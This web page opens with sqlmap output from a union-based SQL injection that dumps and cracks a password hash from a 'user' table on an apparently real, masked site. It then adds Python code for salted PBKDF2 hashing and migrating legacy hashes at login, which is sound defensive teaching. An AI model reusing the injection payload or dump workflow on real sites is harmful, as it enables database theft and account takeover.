    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:18:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:18:44] [INFO] fetching entries of column(s) '`user`, pass' for table 'user' in database 'bdm266490221_db'
[16:18:44] [INFO] used SQL query returns 1 entry
[16:18:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:18:45] [INFO] fetching number of column(s) '`user`, pass' entries for table 'user' in database 'bdm266490221_db'
[16:18:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:18:45] [INFO] retrieved: 1
[16:18:48] [INFO] retrieved:
[16:18:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[16:19:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[16:19:09] [INFO] retrieved: 4d9012b4a77a9524d675dad27c3276ab5705e5e8
[16:22:07] [INFO] recognized possible password hashes in column 'pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:22:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapvAfQDC24962/sqlmaphashes-9Y2NbI.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:22:45] [INFO] using hash method 'sha1_generic_passwd'
[16:22:45] [INFO] resuming password '123321' for hash '4d9012b4a77a9524d675dad27c3276ab5705e5e8'
Database: bdm266490221_db
Table: user
[1 entry]
+---------+---------------------------------------------------+
| user    | pass                                              |
+---------+---------------------------------------------------+
| <blank> | 4d9012b4a77a9524d675dad27c3276ab5705e5e8 (123321) |
+---------+---------------------------------------------------+

[16:22:45] [INFO] table 'bdm266490221_db.`user`' dumped to CSV file '/root/.sqlmap/output/www.****.com/dump/bdm266490221_db/user.csv'
[16:22:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.***.com'

[*] ending @ 16:22:45 /2019-05-28/
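
sqlmap identified the dumped value as a bare SHA-1 hash (`sha1_generic_passwd`) and recovered the password from a wordlist in seconds, which is the expected outcome for an unsalted fast hash of a six-digit password. The following Python example is added here and is not code from the original post or from the affected site. It shows the weakness of that legacy scheme (identical passwords give identical hashes, so one recovered hash is valid for every account that shares it), a salted PBKDF2-HMAC-SHA256 store with constant-time verification, and a login hook that upgrades a legacy record the first time its owner authenticates successfully. User names and passwords below are constructed.

```python
import hashlib
import hmac
import os

# OWASP's 2023 recommendation for PBKDF2-HMAC-SHA256.
PBKDF2_ITERATIONS = 600_000
SCHEME_PREFIX = "pbkdf2_sha256$"

def legacy_hash(password):
    """The weak scheme seen in the dump: bare, unsalted SHA-1 of the password."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()

def hash_password(password, salt=None):
    """Salted, slow hash. A fresh 16-byte random salt per record means two
    users with the same password get unrelated stored values."""
    salt = salt if salt is not None else os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"{SCHEME_PREFIX}{PBKDF2_ITERATIONS}${salt.hex()}${derived.hex()}"

def verify_password(password, stored):
    """Verify against either record format using a constant-time comparison."""
    if stored.startswith(SCHEME_PREFIX):
        _, iterations, salt_hex, derived_hex = stored.split("$")
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
        )
        return hmac.compare_digest(candidate.hex(), derived_hex)
    # Anything else is treated as a legacy unsalted SHA-1 record.
    return hmac.compare_digest(legacy_hash(password), stored)

def login_and_migrate(users, name, password):
    """Authenticate, and on success replace a legacy record with the new
    scheme. Login is the only moment the server legitimately holds the
    plaintext, so it is the only moment a re-hash is possible."""
    stored = users.get(name)
    if stored is None or not verify_password(password, stored):
        return False
    if not stored.startswith(SCHEME_PREFIX):
        users[name] = hash_password(password)
    return True

if __name__ == "__main__":
    # Constructed user store: two accounts that happen to share a weak password.
    users = {"admin": legacy_hash("123321"), "editor": legacy_hash("123321")}
    print("legacy records identical:", users["admin"] == users["editor"])
    print("login ok:", login_and_migrate(users, "admin", "123321"))
    print("admin record after migration:", users["admin"][:40], "...")
    print("records still identical:", users["admin"] == users["editor"])
```

Migration on login is the standard way to retire a legacy hash format without forcing a mass reset; records whose owners never log in again should be expired or reset out of band, since they remain as crackable as the one in the dump above.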

Link to this article: http://www.dtmao.cc/news_show_200082.shtml
